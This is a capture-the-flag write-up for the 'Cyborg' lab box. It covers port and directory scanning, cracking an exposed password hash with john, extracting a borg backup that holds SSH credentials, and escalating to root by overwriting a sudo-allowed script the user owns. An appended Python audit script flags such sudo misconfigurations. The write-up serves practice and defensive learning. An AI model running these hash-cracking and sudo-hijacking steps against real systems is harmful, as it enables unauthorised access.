CTF : Cyborg
Information
- IP: 10.10.26.96
- MYIP: 10.9.85.5
First enumeration
Basics
- NMAP
```console
$ sudo nmap -p22,80 -A 10.10.26.96
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 23:54 CEST
Nmap scan report for 10.10.26.96
Host is up (0.042s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Sony X75CH-series Android TV (Android 5.0) (92%), Linux 2.6.32 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%), QNAP QTS 4.0 - 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   37.78 ms 10.9.0.1
2   37.77 ms 10.10.26.96

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds
```
Vulnerabilities search
```console
$ dirsearch -r -u http://10.10.26.96 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 1543815

Output File: /home/boula/.dirsearch/reports/10.10.26.96/_22-07-13_00-01-41.txt

Error Log: /home/boula/.dirsearch/logs/errors-22-07-13_00-01-41.log

Target: http://10.10.26.96/

[00:01:42] Starting:
[00:01:42] 200 -   11KB - /index.html
[00:01:46] 403 -  276B  - /icons/    (Added to queue)
[00:01:54] 200 -    6KB - /admin/    (Added to queue)
[00:01:54] 301 -  310B  - /admin  ->  http://10.10.26.96/admin/
[00:02:56] 200 -  926B  - /etc/    (Added to queue)
[00:02:56] 301 -  308B  - /etc  ->  http://10.10.26.96/etc/
[ ] 4% 68337/1543815 252/s job:1/4 errors:0
```
I found two files under http://10.10.26.96/etc/squid/:
- squid.conf
- passwd
In passwd I found some creds:
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Using john I managed to crack it:
```console
$ john ./hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
$ john ./hashes.txt --show
music_archive:xxxxxxxx

1 password hash cracked, 0 left
```
After that I decided to explore http://10.10.26.96/admin/
One menu lets us download a tar archive file: http://10.10.26.96/admin/archive.tar
Let's see what we can find in this archive...
The archive contains an encrypted borg backup repository. The passphrase is the one we cracked earlier.
```console
$ borg list home/field/dev/final_archive/
Enter passphrase for key /home/boula/CTF/Cyborg/home/field/dev/final_archive:
music_archive                        Tue, 2020-12-29 15:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
```
Now, we can extract the backup into a directory to explore it:
```console
$ borg extract home/field/dev/final_archive/::music_archive
Enter passphrase for key /home/boula/CTF/Cyborg/home/field/dev/final_archive:
```
Exploit
There is a note:
```console
$ cat ./Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:xxxxxxxx
```
With this note we can connect through ssh as alex.
Privilege escalation
Enumeration for privesc
```console
$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
```
So alex can run a script as root, without a password.
Exploit
Let's see what we can do with it:
```console
$ ls -al /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh
```
alex owns the file but doesn't have write rights on it. As the owner, though, we can change that:
```console
$ chmod +w /etc/mp3backups/backup.sh
```
Now we can modify the script:
```console
$ echo "/bin/bash" > /etc/mp3backups/backup.sh
```
And then, exploit!
```console
$ sudo /etc/mp3backups/backup.sh
root@ubuntu:~# cat /root/root.txt
```
\o/
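The privesc above works because the sudoers rule points at a script the invoking user owns: the mode `r-xr-xr--` looks read-only, but an owner can always `chmod` it. A check that only looks at write bits misses this. The following audit script is an added example and is not part of this writeup or of the TryHackMe room; it parses `sudo -l` output like the one shown above and, for each `NOPASSWD` command, reports whether the invoking user owns or can write the command file or its parent directory. The `parse_sudo_l`/`audit_rule` names, the uid/gid values and the fake filesystem table (`FAKE_FS`, standing in for `os.stat` so the example runs offline) are all constructed for this example; on a real host you would pass `os.stat` and the real uid/gids.

```python
"""Audit sudo NOPASSWD rules for commands the invoking user could tamper with.

Added example (not from the writeup). The sudo -l text below is the one shown
in the writeup; the uid/gid numbers and the fake filesystem are constructed.
"""
import os
import re
import stat
from dataclasses import dataclass

# Matches one rule line as printed by `sudo -l`, e.g.
#     (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S+)")


@dataclass
class Rule:
    command: str
    runas: str
    nopasswd: bool


def parse_sudo_l(output: str) -> list:
    """Return the Rule entries listed after 'may run the following commands'."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            rules.append(Rule(m.group("cmd"), m.group("runas").strip(),
                              "NOPASSWD" in m.group("tags")))
    return rules


def modification_risks(st: os.stat_result, uid: int, gids, label: str) -> list:
    """Ways the user (uid, gids) could change the object described by st."""
    risks = []
    if st.st_uid == uid:
        # Ownership is the decisive check: the owner can chmod the file
        # writable no matter what the current mode bits say.
        risks.append(f"{label} is owned by the invoking user (owner can chmod it writable)")
    if st.st_mode & stat.S_IWOTH:
        risks.append(f"{label} is world-writable")
    elif st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        risks.append(f"{label} is writable by one of the invoking user's groups")
    return risks


def audit_rule(rule: Rule, uid: int, gids, stat_fn=os.stat) -> list:
    """Risks for one sudo rule; stat_fn is injectable so the example runs offline."""
    risks = []
    try:
        risks += modification_risks(stat_fn(rule.command), uid, gids, "command file")
    except FileNotFoundError:
        risks.append("command file does not exist (user could create it)")
    parent = os.path.dirname(rule.command) or "/"
    try:
        # A writable parent lets the user replace the file even when the file
        # itself is root-owned. Sticky directories are still flagged here
        # (conservative); refine if that is too noisy for your fleet.
        risks += modification_risks(stat_fn(parent), uid, gids, "parent directory")
    except FileNotFoundError:
        pass
    return risks


# sudo -l output as shown in the writeup (raw string: the secure_path contains '\:').
SAMPLE_SUDO_L = r"""Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
"""

ALEX_UID, ALEX_GID = 1000, 1000  # constructed values for the example


def fake_stat(mode: int, uid: int, gid: int) -> os.stat_result:
    """Build an os.stat_result with only the fields the audit reads."""
    return os.stat_result((mode, 0, 0, 1, uid, gid, 0, 0, 0, 0))


# Constructed filesystem mirroring `ls -al` from the writeup: the script is
# alex:alex with mode -r-xr-xr--, inside a root-owned directory.
FAKE_FS = {
    "/etc/mp3backups/backup.sh": fake_stat(stat.S_IFREG | 0o554, ALEX_UID, ALEX_GID),
    "/etc/mp3backups": fake_stat(stat.S_IFDIR | 0o755, 0, 0),
}


def fake_stat_fn(path: str) -> os.stat_result:
    if path not in FAKE_FS:
        raise FileNotFoundError(path)
    return FAKE_FS[path]


def audit_sample() -> dict:
    """Audit every NOPASSWD rule in the sample against the constructed filesystem."""
    return {r.command: audit_rule(r, ALEX_UID, {ALEX_GID}, fake_stat_fn)
            for r in parse_sudo_l(SAMPLE_SUDO_L) if r.nopasswd}


if __name__ == "__main__":
    for cmd, risks in audit_sample().items():
        print(cmd, "->", risks or "OK")
```

The fix this check points at is the usual one: a script run through sudo should be owned by root (and live in a root-owned, non-writable directory) with mode 0755 or tighter; the ownership test is what catches the Cyborg case, where the write bits alone look safe.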